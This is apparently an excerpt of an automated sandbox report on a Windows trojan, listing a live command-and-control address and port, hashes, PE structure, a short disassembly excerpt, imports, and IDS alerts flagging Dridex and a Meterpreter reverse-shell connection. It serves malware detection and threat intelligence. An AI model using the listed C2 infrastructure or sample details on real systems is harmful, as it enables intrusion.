                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/match%JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/matcheJP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000003.1967514509.00000265AFF85000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://103.19.190.184:4436/matchJP1KbvjWcM.exe, 00000000.00000003.1967514509.00000265AFF85000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                103.19.190.184
                unknownHong Kong
                38197SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKongtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1584584
                Start date and time:2025-01-05 23:01:08 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 12s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:5
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:JP1KbvjWcM.exe
                renamed because original name is a hash value
                Original Sample Name:553ab6275ae084f4587840c55a7a2eeb.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/3@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 15
                • Number of non-executed functions: 147
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 199.232.210.172, 20.109.210.53, 40.69.42.241, 52.149.20.212, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: JP1KbvjWcM.exe
                TimeTypeDescription
                17:02:03API Interceptor67x Sleep call for process: JP1KbvjWcM.exe modified
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                bg.microsoft.map.fastly.netcZO.exeGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                jaTDEkWCbs.exeGet hashmaliciousQuasarBrowse
                • 199.232.210.172
                3LcZO15oTC.exeGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 199.232.214.172
                Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                • 199.232.214.172
                N5kEzgUBn6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                • 199.232.210.172
                setup64v9.3.4.msiGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
                • 199.232.210.172
                c2.htaGet hashmaliciousRemcosBrowse
                • 199.232.214.172
                phishingtest.emlGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKongarmv6l.elfGet hashmaliciousUnknownBrowse
                • 117.19.90.30
                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                • 112.213.116.149
                file.exeGet hashmaliciousXWormBrowse
                • 112.213.116.149
                arm5.elfGet hashmaliciousUnknownBrowse
                • 117.19.102.86
                jew.ppc.elfGet hashmaliciousUnknownBrowse
                • 112.213.114.230
                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                • 117.19.113.75
                wFg25zfjIL.dllGet hashmaliciousUnknownBrowse
                • 103.45.64.91
                wFg25zfjIL.dllGet hashmaliciousUnknownBrowse
                • 103.45.64.91
                LSQz1xnW54.exeGet hashmaliciousUnknownBrowse
                • 103.45.64.91
                http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                • 121.127.231.212
                No context
                No context
                Process:C:\Users\user\Desktop\JP1KbvjWcM.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:high, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                Process:C:\Users\user\Desktop\JP1KbvjWcM.exe
                File Type:data
                Category:modified
                Size (bytes):328
                Entropy (8bit):3.238004231589766
                Encrypted:false
                SSDEEP:6:kKrSrT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DiqDImsLNkPlE99SNxAhUe/3
                MD5:53B0331E600515ED7CFDD1DB042D1D04
                SHA1:D10EE49348E5163DA7305EC26B2AFF388FA47655
                SHA-256:E77B65CF145A3012D3F81E9BE8613C7289D45E45AC2D56B046C6E351BEA33A95
                SHA-512:D4BE602E1FA85EBE59689C86FA815917EE8EE409AA7938607CCDB2FDEAB5D245700127AE58767866C15B54B01492192B3E9EBCFC4FA5F2D90F94760072FDA7CA
                Malicious:false
                Reputation:low
                Preview:p...... ........b3.q._..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                Process:C:\Users\user\Desktop\JP1KbvjWcM.exe
                File Type:data
                Category:dropped
                Size (bytes):928
                Entropy (8bit):7.60505190459615
                Encrypted:false
                SSDEEP:24:AIaWIM+rqSsNMOFqa3RWsmWX0Jmatg+craEDD:9ay+rqCmq8sOXo9tvcOE3
                MD5:4871B0C4A2E065F9C750B067C5B199E1
                SHA1:F67327A999D788AEE83F09AE2B35BA6A515DD687
                SHA-256:A8CA8A260A86F0E6E3B353011DF866D1567B3BF8EE36B6AD272DB4A89469FB28
                SHA-512:2BF1A0189B37F99169AA495C7C05008966559226638F45309FF794FB267CB8BE02DFF5A00942D302EFDFE79CC7AB59A35B360A2724303F9ACA072329C01DE465
                Malicious:false
                Reputation:low
                Preview:|.Lg&.'.........Q..d...D...d...D...Y.......,....o.AZ........]..e....%n.......of....S......]...........l..]wg..E......,..J.../.s.r.@....R...............]..C.....P..........ml...)..........l....Q.....7...Fe....:...:..Z............:...q.:......f/.+...C..I..)...u._.).Ux......A.....'.......)$..x.;....U......'..........Fc.....9..qh.F..'.f4.T.|)....Z......0VS..k..... .....\.d..>........9.....>..L.:._..".....@..j(.....(a..%.Aw.Q.....a[...Y...]........M.U!...n...............w.....3......c......s......4......s.....-.......I..O....lC..)...*|....l..s(.LQ.b...K[..w..L7.[...B.J..-.3K.[G.G...<.....TpK2.ot..5..y.S...ir...4#.N.V.<......./<?h@[.A.{....X.....<T..........!....b.\>'...;v./b.r3y.S...s...m.k...G.]..-.....Q.\.)...,.C@d{....z)U.,.Q.X..qsc..U..JlC..w..C.9....U.$.*|..|...Fd.....I.;.c....6.lQygbl..U..k@.y.]D..C..........C.-h.2|)r......z........iD
                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                Entropy (8bit):4.683408709645475
                TrID:
                • Win64 Executable (generic) (12005/4) 74.95%
                • Generic Win/DOS Executable (2004/3) 12.51%
                • DOS Executable Generic (2002/1) 12.50%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                File name:JP1KbvjWcM.exe
                File size:216'576 bytes
                MD5:553ab6275ae084f4587840c55a7a2eeb
                SHA1:2c237cb58b4c27b0771e769e4d47fa19b6ad8601
                SHA256:8e550081d6ce27ae8e45a5d8d9af5088e9b1f725ea6eadc47cda7b223f078ea7
                SHA512:863693d80d6cbdbb21fb1669eaaecd21b2b0ce7857911d4c0f5f1ce1d4fd874eafa261ecfcfb6fe15631d74b1d65acef15a3ba880c03df58b18e72249b57d6dd
                SSDEEP:3072:GLCP23GB0kWX9F4VhNvmvM1wnTqHcXFI:GWSY0O/vmvBn9XF
                TLSH:D424F747636138B6C52786B4D0D2C5A43DB2DC28EDE6E90743E1FE1EBA3EA416706533
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Q.&f...............).p...J.................@..........................................`... ............................
                Icon Hash:1f346261d84c6712
                Entrypoint:0x1400013d0
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x140000000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x6626E151 [Mon Apr 22 22:14:41 2024 UTC]
                TLS Callbacks:0x40001920, 0x1, 0x400018f0, 0x1
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:826994b0b08f6b39dd6e5d89103ca266
                Instruction
                dec eax
                sub esp, 28h
                dec eax
                mov eax, dword ptr [000083C5h]
                mov dword ptr [eax], 00000001h
                call 00007F6CE856961Fh
                nop
                nop
                dec eax
                add esp, 28h
                ret
                nop dword ptr [eax]
                dec eax
                sub esp, 28h
                dec eax
                mov eax, dword ptr [000083A5h]
                mov dword ptr [eax], 00000000h
                call 00007F6CE85695FFh
                nop
                nop
                dec eax
                add esp, 28h
                ret
                nop dword ptr [eax]
                dec eax
                sub esp, 28h
                call 00007F6CE8570144h
                dec eax
                cmp eax, 01h
                sbb eax, eax
                dec eax
                add esp, 28h
                ret
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                dec eax
                lea ecx, dword ptr [00000009h]
                jmp 00007F6CE8569859h
                nop dword ptr [eax+00h]
                ret
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                nop
                dec eax
                jmp ecx
                dec eax
                arpl word ptr [00006BB6h], ax
                test eax, eax
                jle 00007F6CE85698A8h
                cmp dword ptr [00006BAFh], 00000000h
                jle 00007F6CE856989Fh
                dec eax
                mov edx, dword ptr [0000BE0Ah]
                dec eax
                mov dword ptr [ecx+eax], edx
                dec eax
                mov edx, dword ptr [0000BE07h]
                dec eax
                arpl word ptr [00006B94h], ax
                dec eax
                mov dword ptr [ecx+eax], edx
                ret
                push ebp
                push edi
                push esi
                push ebx
                dec eax
                sub esp, 38h
                dec eax
                mov edi, ecx
                mov ebx, edx
                mov ecx, 00040000h
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x8b4.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x2a8f0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa0000x4b0.pdata
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3b0000x80.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x90600x28.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xd2300x1f0.idata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x6eb80x70009821c01fd4747aad0230a069590b0749False0.583251953125data6.259348913480805IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0x80000x4d00x600746951e9c8e8eb0deca3e8ff0f117f17False0.6881510416666666data6.00374345728658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0x90000xdf00xe005fd140e418acf407f5dcca641ad3e2dfFalse0.30245535714285715data4.649097585295043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .pdata0xa0000x4b00x60055fba1436f2fda06c5477135a175d11aFalse0.4270833333333333data3.50775850606208IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .xdata0xb0000x4680x6007d202bfe5864389afb40f533c27b737dFalse0.259765625data3.5680761976082636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .bss0xc0000xc000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xd0000x8b40xa00e1b133ef1bdd530cb98f1907953b84d0False0.32109375data3.632126266429373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .CRT0xe0000x600x20095f0bee46fc0a8d265633a8fc963552bFalse0.068359375data0.29046607431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xf0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0x100000x2a8f00x2aa00a909764dcd226089ed830a27b3add73fFalse0.23965015579178886data4.160599677260271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x3b0000x800x20020f73f8251a841b7032a47f27afdc011False0.248046875data1.5021486304447937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x103880x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.3817204301075269
                RT_ICON0x106700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5472972972972973
                RT_ICON0x107980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.43443496801705755
                RT_ICON0x116400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.5875451263537906
                RT_ICON0x11ee80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.671242774566474
                RT_ICON0x124500x3bf3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9913338111683065
                RT_ICON0x160480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.09962439370637644
                RT_ICON0x268700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.1279167542568846
                RT_ICON0x2fd180x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.1831601322626358
                RT_ICON0x33f400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.2337136929460581
                RT_ICON0x364e80x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720EnglishUnited States0.26612426035502956
                RT_ICON0x37f500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3320825515947467
                RT_ICON0x38ff80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4209016393442623
                RT_ICON0x399800x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680EnglishUnited States0.4994186046511628
                RT_ICON0x3a0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5709219858156028
                RT_GROUP_ICON0x3a4a00xd8dataEnglishUnited States0.6296296296296297
                RT_VERSION0x3a5780x374dataEnglishUnited States0.417420814479638
                DLLImport
                KERNEL32.dllCloseHandle, CreateFileA, CreateMailslotA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetLastError, GetMailslotInfo, GetModuleHandleA, GetProcAddress, GetTickCount, HeapAlloc, HeapCreate, HeapReAlloc, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, ReadFile, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
                msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memcpy, memset, signal, strerror, strlen, strncmp, vfprintf, wcslen
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2025-01-05T23:01:59.603758+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449731103.19.190.1844436TCP
                2025-01-05T23:02:01.034309+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1103.19.190.1844436192.168.2.449731TCP
                2025-01-05T23:02:03.786403+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449733103.19.190.1844436TCP
                2025-01-05T23:02:05.623140+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449734103.19.190.1844436TCP
                2025-01-05T23:02:07.393755+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449735103.19.190.1844436TCP
                2025-01-05T23:02:09.235025+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449736103.19.190.1844436TCP
                2025-01-05T23:02:11.011611+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449737103.19.190.1844436TCP
                2025-01-05T23:02:12.823659+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449738103.19.190.1844436TCP
                2025-01-05T23:02:14.627202+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449739103.19.190.1844436TCP
                2025-01-05T23:02:16.431757+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449742103.19.190.1844436TCP
                2025-01-05T23:02:18.201963+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449747103.19.190.1844436TCP
                2025-01-05T23:02:19.969502+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.452090103.19.190.1844436TCP
                2025-01-05T23:02:21.557229+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460047103.19.190.1844436TCP
                2025-01-05T23:02:23.332157+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460050103.19.190.1844436TCP
                2025-01-05T23:02:25.106531+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460052103.19.190.1844436TCP
                2025-01-05T23:02:26.891283+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460055103.19.190.1844436TCP
                2025-01-05T23:02:28.699749+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460056103.19.190.1844436TCP
                2025-01-05T23:02:30.536325+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460057103.19.190.1844436TCP
                2025-01-05T23:02:32.410674+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460058103.19.190.1844436TCP
                2025-01-05T23:02:34.227081+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460059103.19.190.1844436TCP
                2025-01-05T23:02:36.014165+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460060103.19.190.1844436TCP
                2025-01-05T23:02:37.793251+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460061103.19.190.1844436TCP
                2025-01-05T23:02:39.545662+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460062103.19.190.1844436TCP
                2025-01-05T23:02:41.441832+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460063103.19.190.1844436TCP
                2025-01-05T23:02:43.266786+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460064103.19.190.1844436TCP
                2025-01-05T23:02:45.205863+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460065103.19.190.1844436TCP
                2025-01-05T23:02:46.965747+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460066103.19.190.1844436TCP
                2025-01-05T23:02:48.724031+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460067103.19.190.1844436TCP
                2025-01-05T23:02:50.530591+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460068103.19.190.1844436TCP
                2025-01-05T23:02:52.347527+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460069103.19.190.1844436TCP
                2025-01-05T23:02:54.167621+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460070103.19.190.1844436TCP
                2025-01-05T23:02:55.975591+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460071103.19.190.1844436TCP
                2025-01-05T23:02:57.892289+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460072103.19.190.1844436TCP
                2025-01-05T23:02:59.672608+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460079103.19.190.1844436TCP
                2025-01-05T23:03:01.505346+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460090103.19.190.1844436TCP
                2025-01-05T23:03:03.279739+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460106103.19.190.1844436TCP
                2025-01-05T23:03:05.028510+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460117103.19.190.1844436TCP
                2025-01-05T23:03:06.787605+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460126103.19.190.1844436TCP
                2025-01-05T23:03:08.572683+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460136103.19.190.1844436TCP
                2025-01-05T23:03:10.339222+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460150103.19.190.1844436TCP
                2025-01-05T23:03:12.129686+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460163103.19.190.1844436TCP
                2025-01-05T23:03:13.933920+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460175103.19.190.1844436TCP
                2025-01-05T23:03:15.724059+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460189103.19.190.1844436TCP
                2025-01-05T23:03:17.498949+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460200103.19.190.1844436TCP
                2025-01-05T23:03:19.165639+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460207103.19.190.1844436TCP
                2025-01-05T23:03:20.927163+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460220103.19.190.1844436TCP
                2025-01-05T23:03:22.713365+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460232103.19.190.1844436TCP
                2025-01-05T23:03:24.526638+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460244103.19.190.1844436TCP
                2025-01-05T23:03:26.320314+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460256103.19.190.1844436TCP
                2025-01-05T23:03:28.130833+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460270103.19.190.1844436TCP
                2025-01-05T23:03:29.946925+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460282103.19.190.1844436TCP
                2025-01-05T23:03:32.006167+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460297103.19.190.1844436TCP
                2025-01-05T23:03:33.767331+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460308103.19.190.1844436TCP
                2025-01-05T23:03:35.553283+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460323103.19.190.1844436TCP
                2025-01-05T23:03:37.385782+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460335103.19.190.1844436TCP
                2025-01-05T23:03:39.171778+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460347103.19.190.1844436TCP
                2025-01-05T23:03:41.007473+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460359103.19.190.1844436TCP
                2025-01-05T23:03:42.809595+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460364103.19.190.1844436TCP
                2025-01-05T23:03:44.629614+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460365103.19.190.1844436TCP
                2025-01-05T23:03:46.375546+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460366103.19.190.1844436TCP
                2025-01-05T23:03:48.163558+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460367103.19.190.1844436TCP
                2025-01-05T23:03:49.930369+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460368103.19.190.1844436TCP
                2025-01-05T23:03:51.715160+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460369103.19.190.1844436TCP
                2025-01-05T23:03:53.718995+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460370103.19.190.1844436TCP
                2025-01-05T23:03:55.491219+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460371103.19.190.1844436TCP
                2025-01-05T23:03:57.049787+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460372103.19.190.1844436TCP
                2025-01-05T23:03:58.858003+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460373103.19.190.1844436TCP
                2025-01-05T23:04:00.643548+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460374103.19.190.1844436TCP
                2025-01-05T23:04:02.680495+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.460375103.19.190.1844436TCP
